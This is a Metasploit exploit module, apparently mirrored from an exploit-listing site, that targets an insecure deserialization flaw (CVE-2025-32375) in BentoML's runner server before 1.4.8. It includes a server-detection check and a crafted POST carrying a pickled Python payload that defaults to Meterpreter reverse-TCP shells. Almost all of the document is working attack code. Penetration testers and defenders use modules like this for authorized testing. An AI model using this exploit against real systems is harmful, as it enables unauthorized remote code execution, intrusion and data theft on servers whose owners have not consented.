Share
## https://sploitus.com/exploit?id=PACKETSTORM:190623
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'BentoML\'s runner server RCE',
'Description' => %q{
There was an insecure deserialization in BentoML's runner server prior to version 1.4.8.
By setting specific headers and parameters in the POST request, it is possible to execute unauthorized arbitrary code in the context of the user running the server,
which will grant initial access and information disclosure.
},
'Author' => [
'SeaWind', # Vulnerability discovery and PoC
'Takahiro Yokoyama' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-32375'],
['URL', 'https://github.com/advisories/GHSA-7v4r-c989-xh26'],
],
'Targets' => [
[
'Python payload',
{
'Arch' => ARCH_PYTHON,
'Platform' => 'python',
'Type' => :python,
'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
}
],
[
'Linux Command', {
'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
'DefaultOptions' => {
# defaults to cmd/linux/http/aarch64/meterpreter/reverse_tcp
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
}
}
],
],
'DefaultOptions' => {
'FETCH_DELETE' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => '2025-04-09',
'Notes' => {
'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION, ]
}
)
)
register_options(
[
Opt::RPORT(3000)
]
)
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'metrics')
})
return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
return Exploit::CheckCode::Unknown('BentoML\'s runner server not detected.') unless res&.get_html_document&.text&.include?('bentoml_runner')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'readyz')
})
return Exploit::CheckCode::Unknown('BentoML\'s runner server not ready.') unless res&.code == 200
Exploit::CheckCode::Detected("BentoML\'s runner server detected.")
# Version check not available
end
def exploit
if target['Type'] == :python
pl = payload.encoded
else
pl = "import os;os.system(\"\"\"\n#{payload.encoded}\n\"\"\")"
end
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'headers' => {
'args-number' => '1',
'Content-Type' => 'application/vnd.bentoml.pickled',
'Payload-Container' => 'NdarrayContainer',
'Payload-Meta' => '{"format": "default"}',
'Batch-Size' => '-1'
},
'data' => Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, pl)
})
# No response check here
end
end